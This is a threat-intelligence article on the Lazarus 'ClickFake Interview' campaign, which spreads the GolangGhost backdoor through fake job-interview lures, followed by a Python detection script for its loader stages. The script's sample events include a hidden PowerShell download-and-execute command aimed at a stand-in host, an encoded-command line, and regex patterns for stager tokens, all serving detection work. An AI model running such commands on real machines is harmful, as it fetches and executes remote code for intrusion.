A sophisticated cyber espionage campaign attributed to the Advanced Agent Cluster of the Lazarus Group has been exposed by Sekoia's Threat Detection and Research (TDR) team. The campaign, named “ClickFake Interview”, uses a social engineering technique known as ClickFix to distribute the GolangGhost malware, targeting organizations in the cryptocurrency and technology sectors.
ClickFake Interview is a social engineering tactic that deceives victims by masquerading as a job interview. The attackers craft messages impersonating employers and, under the pretext of interview preparation, lure users into opening documents or links that carry the malware. The campaign is part of a series of attacks known as “ContagiousInterview”, reflecting Lazarus's continued innovation in exploitation strategies aimed at targets in the rapidly growing digital asset ecosystem.
At the core of the campaign is the ClickFix technique, a multi-stage exploitation process designed to be robust and hard to detect. The chain typically begins with a rogue file carrying malicious embedded content and relies on intermediate loaders such as PowerShell scripts, Office macros, or shortcut files to bypass defenses. Once activated, the malicious code uses a cascaded payload delivery technique, in which the shellcode or dropper is stored encrypted and decrypted only at runtime, deploying GolangGhost silently and preventing a sandbox from recording the full behavior.
GolangGhost is a backdoor implant written in the Go programming language for cross-platform use, supporting Windows, Linux and macOS. It communicates with its command-and-control (C2) server over an encrypted channel and integrates dynamically downloadable modules, enabling remote functions such as system command execution, theft of sensitive information, file collection, internal network scanning, and lateral movement within corporate environments. Beyond its modularity, the malware uses obfuscation, mimics normal behavior, and avoids the API hooks commonly used by monitoring tools.
The ContagiousInterview campaign reflects the remarkable evolution of the Lazarus Group's tactics, techniques and procedures (TTPs). Combining social engineering with a sophisticated malware deployment mechanism such as ClickFix improves infection success rates while reducing the likelihood of early detection. The focus on organizations and individuals in the cryptocurrency sector suggests that financial gain and strategic intelligence remain this group's priorities.
Commenting on the finding, WhiteHat said: “ClickFix is essentially an exploitation chain combining social engineering and intermediate exploitation techniques. Lazarus takes advantage of the hierarchical control model to avoid the sandbox recording the entire behavior. The GolangGhost code shows a clear investment in modularity and avoids reverse analysis by obfuscating the code as well as avoiding API hooks. ClickFix is more than just a method of spreading; it is a highly scripted, purposeful, and adaptive scam process that follows user behavior. This is a clear indication that Lazarus is investing heavily in both engineering and exploiting the human element.”
Sekoia's in-depth analysis not only elucidated new attack methods but also provided a comprehensive view of how the attackers integrate social manipulation and advanced programming techniques to overcome traditional security barriers. Organizations operating in crypto, fintech, and technology are advised to strengthen email filtering, deploy robust EDR solutions, and run awareness training on new spear-phishing lures such as ClickFake Interview.
The appearance of ClickFix and GolangGhost suggests that Lazarus is adapting its attack techniques to increase both customization and the ability to evade behavioral analysis. Defense teams should focus on detecting dynamically loaded payloads, monitoring for anomalous processes, controlling the misuse of remote administration tools, and strengthening human-level incident response, which remains the easiest link to exploit for both APT groups and cybercriminal organizations.
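The loader stages named above (an Office macro or a shortcut file handing off to a hidden PowerShell that stages code in memory) are what an endpoint detection rule for this chain would key on. The following is an added illustration, not code from Sekoia, WhiteHat or the campaign itself; the event format, process names and sample log lines are constructed for this example and do not follow any real EDR schema.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (simplified format, not a real EDR schema).
SAMPLE_EVENTS = [
    'parent=winword.exe image=powershell.exe cmd="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"',
    'parent=explorer.exe image=powershell.exe cmd="powershell.exe -w hidden -c iex (New-Object Net.WebClient).DownloadString(\'https://interview.example/prep\')"',
    'parent=svchost.exe image=powershell.exe cmd="powershell.exe -File C:\\scripts\\inventory.ps1"',
    'parent=explorer.exe image=notepad.exe cmd="notepad.exe interview_notes.txt"',
]

LINE_RE = re.compile(r'parent=(\S+) image=(\S+) cmd="(.*)"$')
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Hidden window: the user who opened the lure should not see a console appear.
HIDDEN_RE = re.compile(r"(?i)-w(indowstyle)?\s+hidden")
# Tokens typical of a stager that decodes or fetches the next stage in memory.
STAGER_RE = re.compile(r"(?i)(-e(nc|ncodedcommand)?\b|frombase64string|\biex\b|downloadstring|invoke-expression)")


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    return ProcEvent(m.group(1).lower(), m.group(2).lower(), m.group(3))


def score_event(ev: ProcEvent) -> list:
    """Return the reasons an event resembles a ClickFix-style loader stage (empty = nothing suspicious)."""
    reasons = []
    if ev.image not in SCRIPT_HOSTS:
        return reasons
    if ev.parent in OFFICE_PARENTS:
        reasons.append("script host spawned by Office (macro loader)")
    if ev.parent == "explorer.exe" and HIDDEN_RE.search(ev.cmdline):
        reasons.append("user-launched script host with hidden window (shortcut/lure file)")
    for m in STAGER_RE.finditer(ev.cmdline):
        reasons.append(f"in-memory staging token: {m.group(0)}")
    return reasons


def triage(lines) -> list:
    """Parse raw event lines and keep only those with at least one reason, as (event, reasons) pairs."""
    return [(ev, r) for ev in map(parse_event, lines) if (r := score_event(ev))]
```

Running `triage(SAMPLE_EVENTS)` flags the macro-spawned and the hidden explorer-spawned PowerShell while leaving the scheduled admin script and the notepad launch alone.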